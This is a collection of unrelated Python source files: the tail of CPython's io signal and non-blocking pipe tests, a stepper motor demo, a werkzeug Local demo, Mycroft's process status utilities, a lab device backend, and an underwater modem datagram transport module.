self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
DualStepperTest.py
|
#!/usr/bin/python
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor
import time
import atexit
import threading
import random
# create a default object, no changes to I2C address or frequency
mh = Adafruit_MotorHAT()
# create empty threads (these will hold the stepper 1 and 2 threads)
st1 = threading.Thread()
st2 = threading.Thread()
# recommended for auto-disabling motors on shutdown!
def turnOffMotors():
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
atexit.register(turnOffMotors)
myStepper1 = mh.getStepper(200, 1) # 200 steps/rev, motor port #1
myStepper2 = mh.getStepper(200, 2) # 200 steps/rev, motor port #1
myStepper1.setSpeed(60) # 30 RPM
myStepper2.setSpeed(60) # 30 RPM
stepstyles = [Adafruit_MotorHAT.SINGLE, Adafruit_MotorHAT.DOUBLE, Adafruit_MotorHAT.INTERLEAVE, Adafruit_MotorHAT.MICROSTEP]
def stepper_worker(stepper, numsteps, direction, style):
#print("Steppin!")
stepper.step(numsteps, direction, style)
#print("Done")
while (True):
if not st1.isAlive():
randomdir = random.randint(0, 1)
print("Stepper 1"),
if (randomdir == 0):
dir = Adafruit_MotorHAT.FORWARD
print("forward"),
else:
dir = Adafruit_MotorHAT.BACKWARD
print("backward"),
randomsteps = random.randint(10,50)
print("%d steps" % randomsteps)
st1 = threading.Thread(target=stepper_worker, args=(myStepper1, randomsteps, dir, stepstyles[random.randint(0,3)],))
st1.start()
if not st2.isAlive():
print("Stepper 2"),
randomdir = random.randint(0, 1)
if (randomdir == 0):
dir = Adafruit_MotorHAT.FORWARD
print("forward"),
else:
dir = Adafruit_MotorHAT.BACKWARD
print("backward"),
randomsteps = random.randint(10,50)
print("%d steps" % randomsteps)
st2 = threading.Thread(target=stepper_worker, args=(myStepper2, randomsteps, dir, stepstyles[random.randint(0,3)],))
st2.start()
|
test_for_process_thread.py
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/2/8 0008 23:58
# @Author : Gpp
# @File : test_for_process_thread.py
import threading, time
# def a_thread():
# print('i am a thread')
# # time.sleep(3)
# print(threading.current_thread().getName())
#
#
# t = threading.Thread(target=a_thread)
# t.start()
# print(threading.current_thread().getName())
# 线程隔离
# 操作数据
# werkzug local local 字典
# {thread——id1:}
from werkzeug.local import Local
class A:
b = 1
# my_obj = A()
my_obj = Local()
my_obj.b = 1
def worker():
# 新线程
time.sleep(2)
my_obj.b = 2
print('in new thread b is:' + str(my_obj.b))
new_t = threading.Thread(target=worker)
new_t.start()
# time.sleep(1)
print('in main thread b is:' + str(my_obj.b))
|
process_utils.py
|
from collections import namedtuple
from enum import IntEnum
import json
import logging
import signal as sig
import sys
from threading import Event, Thread
from time import sleep
from .log import LOG
def reset_sigint_handler():
"""Reset the sigint handler to the default.
This fixes KeyboardInterrupt not getting raised when started via
start-mycroft.sh
"""
sig.signal(sig.SIGINT, sig.default_int_handler)
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received."""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
_log_all_bus_messages = False
def bus_logging_status():
global _log_all_bus_messages
return _log_all_bus_messages
def _update_log_level(msg, name):
"""Update log level for process.
Args:
msg (Message): Message sent to trigger the log level change
name (str): Name of the current process
"""
global _log_all_bus_messages
# Respond to requests to adjust the logger settings
lvl = msg["data"].get("level", "").upper()
if lvl in ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"]:
LOG.level = lvl
LOG(name).info("Changing log level to: {}".format(lvl))
try:
logging.getLogger().setLevel(lvl)
logging.getLogger('urllib3').setLevel(lvl)
except Exception:
pass # We don't really care about if this fails...
else:
LOG(name).info("Invalid level provided: {}".format(lvl))
# Allow enable/disable of messagebus traffic
log_bus = msg["data"].get("bus", None)
if log_bus is not None:
LOG(name).info("Bus logging: {}".format(log_bus))
_log_all_bus_messages = log_bus
def create_echo_function(name, whitelist=None):
"""Standard logging mechanism for Mycroft processes.
This handles the setup of the basic logging for all Mycroft
messagebus-based processes.
TODO 20.08: extract log level setting thing completely from this function
Args:
name (str): Reference name of the process
whitelist (list, optional): List of "type" strings. If defined, only
messages in this list will be logged.
Returns:
func: The echo function
"""
from mycroft.configuration import Configuration
blacklist = Configuration.get().get("ignore_logs")
# Make sure whitelisting doesn't remove the log level setting command
if whitelist:
whitelist.append('mycroft.debug.log')
def echo(message):
global _log_all_bus_messages
try:
msg = json.loads(message)
msg_type = msg.get("type", "")
# Whitelist match beginning of message
# i.e 'mycroft.audio.service' will allow the message
# 'mycroft.audio.service.play' for example
if whitelist and not any([msg_type.startswith(e)
for e in whitelist]):
return
if blacklist and msg_type in blacklist:
return
if msg_type == "mycroft.debug.log":
_update_log_level(msg, name)
elif msg_type == "registration":
# do not log tokens from registration messages
msg["data"]["token"] = None
message = json.dumps(msg)
except Exception as e:
LOG.info("Error: {}".format(repr(e)), exc_info=True)
if _log_all_bus_messages:
# Listen for messages and echo them for logging
LOG(name).info("BUS: {}".format(message))
return echo
def start_message_bus_client(service, bus=None, whitelist=None):
"""Start the bus client daemon and wait for connection.
Args:
service (str): name of the service starting the connection
bus (MessageBusClient): an instance of the Mycroft MessageBusClient
whitelist (list, optional): List of "type" strings. If defined, only
messages in this list will be logged.
Returns:
A connected instance of the MessageBusClient
"""
# Local imports to avoid circular importing
from mycroft.messagebus.client import MessageBusClient
from mycroft.configuration import Configuration
# Create a client if one was not provided
if bus is None:
bus = MessageBusClient()
Configuration.set_config_update_handlers(bus)
bus_connected = Event()
bus.on('message', create_echo_function(service, whitelist))
# Set the bus connected event when connection is established
bus.once('open', bus_connected.set)
create_daemon(bus.run_forever)
# Wait for connection
bus_connected.wait()
LOG.info('Connected to messagebus')
return bus
class ProcessState(IntEnum):
"""Oredered enum to make state checks easy.
For example Alive can be determined using >= ProcessState.ALIVE,
which will return True if the state is READY as well as ALIVE.
"""
NOT_STARTED = 0
STARTED = 1
ERROR = 2
STOPPING = 3
ALIVE = 4
READY = 5
# Process state change callback mappings.
_STATUS_CALLBACKS = [
'on_started',
'on_alive',
'on_ready',
'on_error',
'on_stopping',
]
# namedtuple defaults only available on 3.7 and later python versions
if sys.version_info < (3, 7):
StatusCallbackMap = namedtuple('CallbackMap', _STATUS_CALLBACKS)
StatusCallbackMap.__new__.__defaults__ = (None,) * 5
else:
StatusCallbackMap = namedtuple(
'CallbackMap',
_STATUS_CALLBACKS,
defaults=(None,) * len(_STATUS_CALLBACKS),
)
class ProcessStatus:
"""Process status tracker.
The class tracks process status and execute callback methods on
state changes as well as replies to messagebus queries of the
process status.
Args:
name (str): process name, will be used to create the messagebus
messagetype "mycroft.{name}...".
bus (MessageBusClient): Connection to the Mycroft messagebus.
callback_map (StatusCallbackMap): optionally, status callbacks for the
various status changes.
"""
def __init__(self, name, bus, callback_map=None):
# Messagebus connection
self.bus = bus
self.name = name
self.callbacks = callback_map or StatusCallbackMap()
self.state = ProcessState.NOT_STARTED
self._register_handlers()
def _register_handlers(self):
"""Register messagebus handlers for status queries."""
self.bus.on('mycroft.{}.is_alive'.format(self.name), self.check_alive)
self.bus.on('mycroft.{}.is_ready'.format(self.name),
self.check_ready)
# The next one is for backwards compatibility
# TODO: remove in 21.02
self.bus.on(
'mycroft.{}.all_loaded'.format(self.name), self.check_ready
)
def check_alive(self, message=None):
"""Respond to is_alive status request.
Args:
message: Optional message to respond to, if omitted no message
is sent.
Returns:
bool, True if process is alive.
"""
is_alive = self.state >= ProcessState.ALIVE
if message:
status = {'status': is_alive}
self.bus.emit(message.response(data=status))
return is_alive
def check_ready(self, message=None):
"""Respond to all_loaded status request.
Args:
message: Optional message to respond to, if omitted no message
is sent.
Returns:
bool, True if process is ready.
"""
is_ready = self.state >= ProcessState.READY
if message:
status = {'status': is_ready}
self.bus.emit(message.response(data=status))
return is_ready
def set_started(self):
"""Process is started."""
self.state = ProcessState.STARTED
if self.callbacks.on_started:
self.callbacks.on_started()
def set_alive(self):
"""Basic loading is done."""
self.state = ProcessState.ALIVE
if self.callbacks.on_alive:
self.callbacks.on_alive()
def set_ready(self):
"""All loading is done."""
self.state = ProcessState.READY
if self.callbacks.on_ready:
self.callbacks.on_ready()
def set_stopping(self):
"""Process shutdown has started."""
self.state = ProcessState.STOPPING
if self.callbacks.on_stopping:
self.callbacks.on_stopping()
def set_error(self, err=''):
"""An error has occured and the process is non-functional."""
# Intentionally leave is_started True
self.state = ProcessState.ERROR
if self.callbacks.on_error:
self.callbacks.on_error(err)
|
kpa_backend.py
|
from oai_kpa_stm_data import OaiKpaSTM
from oia_kpa_power_data import OaiKpaPower
from oai_kpa_mpp_data import OaiKpaMPP
from oai_kpa_interface import OaiDigitalModule
import time
import json
import threading
class DeviceBackend:
def __init__(self, **kwargs):
self.stm_id = kwargs.get('stm_id', '20713699424D')
self.bdd_id = kwargs.get('bdd_id', '20643699424D')
self.be_id = kwargs.get('be_id', '20523688424D')
self.mku_id = kwargs.get('mku_id', '20713699424D')
self.dep_id = kwargs.get('dep_id', '207F369F424D')
self.interface_id = kwargs.get('interface_id', '20703699424D')
self.write_period_ms = 300
self.thread_daemon_mode = kwargs.get('thread_daemon_mode', False)
self.stm = None
self.bdd = None
self.be = None
self.dep = None
self.mku = None
self.mko = None
self.interface = None
self.parser_thread = None
self.thread_flag = False
def connect(self):
self.stm = OaiKpaSTM(serial_num=self.stm_id)
self.stm.connect(serial_num=self.stm_id)
self.bdd = OaiKpaPower(serial_num=self.bdd_id)
self.bdd.connect(serial_num=self.bdd_id)
self.bdd.test_init()
self.be = OaiKpaPower(serial_num=self.be_id)
self.be.connect(serial_num=self.be_id)
self.be.test_init()
self.dep = OaiKpaMPP(serial_num=self.dep_id)
self.dep.connect()
self.interface = OaiDigitalModule(serial_num=self.interface_id)
self.interface.connect()
self.start_parser_thread()
def start_parser_thread(self):
self.parser_thread = threading.Thread(target=self.parser, daemon=self.thread_daemon_mode)
self.thread_flag = True
self.parser_thread.start()
def stop_parser_thread(self):
self.thread_flag = False
self.parser_thread = None
def parser(self):
while self.thread_flag:
with open('src/json/view_model.json', 'r+', encoding='utf8') as f:
d = json.load(f)
d['stm']['connection_status'] = True if self.stm.state == 1 else False
stm_data = self.stm.get_channels_values()
for model_data, stm_value, stm_state in zip(d['stm']['table1']['data'], stm_data[0][:3], stm_data[1][:3]):
model_data['value'] = float("{:.2f}".format(stm_value))
model_data['state'] = stm_state
for model_data, stm_value, stm_state in zip(d['stm']['table2']['data'], stm_data[0][3:12], stm_data[1][3:12]):
model_data['value'] = float("{:.2f}".format(stm_value))
model_data['state'] = stm_state
for model_data, stm_value, stm_state in zip(d['stm']['table3']['data'], stm_data[0][12:24], stm_data[1][12:24]):
model_data['value'] = float("{:.2f}".format(stm_value))
model_data['state'] = stm_state
bdd_voltage = self.bdd.client.ai_register_map[2141] * 0.00125
bdd_current = self.bdd.client.ai_register_map[2142]
d['power']['bdd']['connection_status'] = True if self.bdd.state == 1 else False
d['power']['bdd']['on_state'] = True if self.bdd.on_off == 1 else False
d['power']['bdd']['voltage'] = float("{:.2f}".format(bdd_voltage))
d['power']['bdd']['current'] = float(bdd_current)
d['power']['bdd']['power'] = float("{:.2f}".format(bdd_voltage * bdd_current))
be_voltage = self.be.client.ai_register_map[2141] * 0.00125
be_current = self.be.client.ai_register_map[2142]
d['power']['be']['connection_status'] = True if self.be.state == 1 else False
d['power']['bdd']['on_state'] = True if self.be.on_off == 1 else False
d['power']['be']['voltage'] = float("{:.2f}".format(be_voltage))
d['power']['be']['current'] = be_current
d['power']['be']['power'] = float("{:.2f}".format(be_voltage * be_current))
d['dep']['connection_status'] = True if self.dep.state == 1 else False
d['interface']['connection_status'] = True if self.interface.state == 1 else False
docking_control = self.get_docking_control()
print(docking_control)
d['stm']['table4']['data'][0]['value'] = docking_control[0]
d['stm']['table4']['data'][0]['state'] = docking_control[1]
f.seek(0)
json.dump(d, f, indent=4, ensure_ascii=False)
f.truncate()
time.sleep(self.write_period_ms / 1000)
def power_set_voltage(self, module='bdd', voltage=27):
if module == 'bdd':
self.bdd.voltage_expected = voltage * 1000
self.bdd.voltage_set()
elif module == 'be':
self.be.voltage_expected = voltage * 1000
self.be.voltage_set()
else:
print("ERROR: 'power_set_voltage' incorrect module")
with open('src/json/view_model.json', 'r+', encoding='utf8') as f:
d = json.load(f)
d['power'][module]['aim_voltage'] = voltage * 1000
f.seek(0)
json.dump(d, f, indent=4, ensure_ascii=False)
f.truncate()
def dep_set_voltage(self, voltage):
if voltage == 0 or -30 or 30:
self.dep.DEP_control(voltage=voltage)
with open('src/json/view_model.json', 'r+', encoding='utf8') as f:
d = json.load(f)
d['dep']['voltage'] = voltage
f.seek(0)
json.dump(d, f, indent=4, ensure_ascii=False)
f.truncate()
else:
print("ERROR: dep incorrect voltage: " + voltage)
def get_docking_control(self):
val = self.interface.get_analog_inputs()[0]
state = 0
if val <= 1500:
state = 2
elif val > 1500 and val < 3000:
state = 1
elif val >= 3000:
state = 0
print([val, state])
return [val, state]
if __name__ == "__main__":
backend = DeviceBackend()
backend.connect()
|
transport.py
|
# encoding=utf-8
"""
Arbitrary size data transfers for Water Linked Underwater Modems
WlUDPSocket is the interface for sending/receiving arbitrary length data (datagram) with
a Water Linked Underwater Modem.
This style of transfer is suitable for short messages and has low overhead at 3 bytes for each
datagram (1 start byte, 1 checksum and 1 end byte).
The datagram will be corrupted by any single modem packet dropped (while still taking the full time to transmit),
which means it is only suitable for short datagrams.
The Modem-M64 has a payload size of 8 bytes and hence messages, so the chance of success with given
chance of any packet lost is given by:
chance of success = (100 - chance of packet loss) / 100 ^ (number of packets sent) * 100
For example, with a 5% chance of packet loss and datagram of 77 bytes (with the 3 overhead bytes this gives 10 packets):
chance of success = (1.0-0.05)**10 * 100 = 59.8%
Internally it uses a thread to frame, packetizes and sends the datagrams given via the "send" function.
When a full datagram is received by the modem it is put on a queue and can be retrieved with the "receive" function.
"""
from __future__ import division, print_function
import threading
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import logging
from abc import abstractmethod
from cobs import cobsr as cobs
import crcmod
# Logger
log = logging.getLogger(__file__)
# Python2 detection
IS_PY2 = False
if sys.version_info < (3, 0):
IS_PY2 = True
### Debug
def printable(ch):
if ch < 32:
return "."
if ch > 127:
return "."
return chr(ch)
def pretty_packet(pkt):
_hx = " ".join("{:02x}".format(x) for x in pkt)
return "[{}] {}".format(_hx, "".join([printable(x) for x in pkt]))
FRAME_END = 0 # COBS guarantees no zeros in the payload
if IS_PY2:
FRAME_END = chr(0)
# The payload is internally checksummed by the modem, but we need to detect if a packet is dropped
# so a simple CRC-8 is sufficient
crc_func = crcmod.predefined.mkPredefinedCrcFun("crc-8")
def frame(data):
""" Frame data using COBS for transmission """
crc = crc_func(data)
framed = bytearray(data)
framed.append(crc)
if IS_PY2:
framed = bytes(framed)
framed = cobs.encode(framed)
framed = bytearray(framed)
framed.append(FRAME_END)
return framed
def pad_payload(data, payload_size):
"""
Pad data with zero data until it's size is the same as the given payload_size
"""
send = bytearray(data)
left = payload_size - len(send)
while left >= 2:
# Pad with an (COBS) empty frame
send.append(1) # COBS Start byte
send.append(FRAME_END)
left = payload_size - len(send)
if left == 1:
# Pad with a frame end
send.append(FRAME_END)
return send
def unframe(buffer):
""" Decode frame and return data """
# Remove terminating 0
if buffer and buffer[-1] == 0:
buffer.pop()
if IS_PY2:
buffer = bytes(buffer)
try:
decoded = cobs.decode(buffer)
except cobs.DecodeError as err:
log.warning("MSG Decode error {}".format(err))
return False
if not decoded:
# Padding/Fill frame only, don't do anything
return None
expected_crc = decoded[-1]
data = decoded[:-1]
data_crc = crc_func(data)
if IS_PY2:
expected_crc = ord(expected_crc)
if data_crc != expected_crc:
log.warning("CRC ERR: Sender crc: {:02x} Received data crc: {:02x}".format(expected_crc, data_crc))
return False
return data
class WlUDPBase(object):
"""
WlUDPBase is the base class for sending/receiving arbitrary length data with a Water Linked Underwater Modem
"""
def __init__(self, modem, desired_queue_length=2, diagnostic_poll_time=0, debug=True):
super(WlUDPBase, self).__init__()
self._tx_buf = bytearray()
self._rx_buf = bytearray()
# Reference to the wlmodem to use
self.modem = modem
# How many packets to queue in the modem at any time
self.desired_queue_length = desired_queue_length
self.debug = debug
# Periodically load diagnostic and store it in the object for the user
# to be able to refer to it
self.diagnostic = dict()
# How often do we update the diagnostic
self.diagnostic_poll_time = diagnostic_poll_time
# Timestamp for next update of diagnostic
self._diagnostic_timeout = 0
@property
def payload_size(self):
return self.modem.payload_size
def _run_send(self):
""" Check if we need to add more data to the modem for transmission """
if self.modem.cmd_get_queue_length() < self.desired_queue_length:
# Tx queue on modem is getting low, lets add another packet
if len(self._tx_buf) < self.payload_size:
# The transmit buffer is less than the payload, let's load more data
self._fill_tx_buf()
# Check if we have anything to transmit
if self._tx_buf:
# Get the next packet to transmit
send = self._get_next_tx_packet()
# Queue the packet
if self.debug:
log.info("Queing packet {}".format(pretty_packet(send)))
self.modem.cmd_queue_packet(send)
if self.diagnostic_poll_time > 0 and time.time() > self._diagnostic_timeout:
# Update diagnostic data if enabled and we have timed out
self.diagnostic = self.modem.cmd_get_diagnostic()
self._diagnostic_timeout = time.time() + self.diagnostic_poll_time
def _run_receive(self):
""" Check if we have gotten any new data from the modem """
received = self.modem.get_data_packet(0)
if received:
if self.debug:
log.info("Got packet {}".format(pretty_packet(received)))
self._rx_buf.extend(received)
# If we have a \0 we got a datagram
if self._rx_buf.find(FRAME_END) >= 0:
if self.debug:
log.info("Got full datagram, let's decode it")
while self._rx_buf.find(FRAME_END) >= 0:
frame = self._extract_frame_from_rx_buf()
# Remove the framing
data = unframe(frame)
if data is None:
# Fill frame only, ignore that
continue
if data:
self._fill_rx_buf(data)
else:
# Error occured
if self.debug:
log.warning("MSG: Invalid")
@abstractmethod
def _fill_tx_buf(self):
""" This function is called when _tx_buf is too short to fill a packet and more data is needed"""
def _get_next_tx_packet(self):
""" Get next packet for modem to transmit """
send = self._tx_buf[:self.payload_size]
self._tx_buf = self._tx_buf[self.payload_size:]
if len(send) < self.payload_size:
# Too little data available to fill desired payload size, we need to pad it
send = pad_payload(send, self.payload_size)
return send
@abstractmethod
def _fill_rx_buf(self, data):
""" This function is called when a full datagram is received to fill the received queue """
def _extract_frame_from_rx_buf(self):
idx = self._rx_buf.find(FRAME_END)
# Extract the frame
frame = self._rx_buf[:idx]
# Remove the frame from tx_buf
self._rx_buf = self._rx_buf[idx:]
self._rx_buf.pop(0) # Remove the FRAME_END
return frame
class WlUDPSocket(WlUDPBase):
"""
Arbitrary size data transfers for Water Linked Underwater Modems
WlUDPSocket is the interface for sending/receiving arbitrary length data (datagram) with
a Water Linked Underwater Modem.
See package documentation for more details.
Internally it uses a thread to frame, packetizes and sends the datagrams given via the "send" function.
When a full datagram is received by the modem it is put on a queue and can be retrieved with the "receive" function.
Warning: Be careful of accessing the internal variables/functions (ie anything starting with _) since it can lead to upredictible results.
Warning: Calling functions on the "wlmodem" passed to this object can lead to unpredictible results since the WlUDPSocket
and your code might access the serial port at the same time.
"""
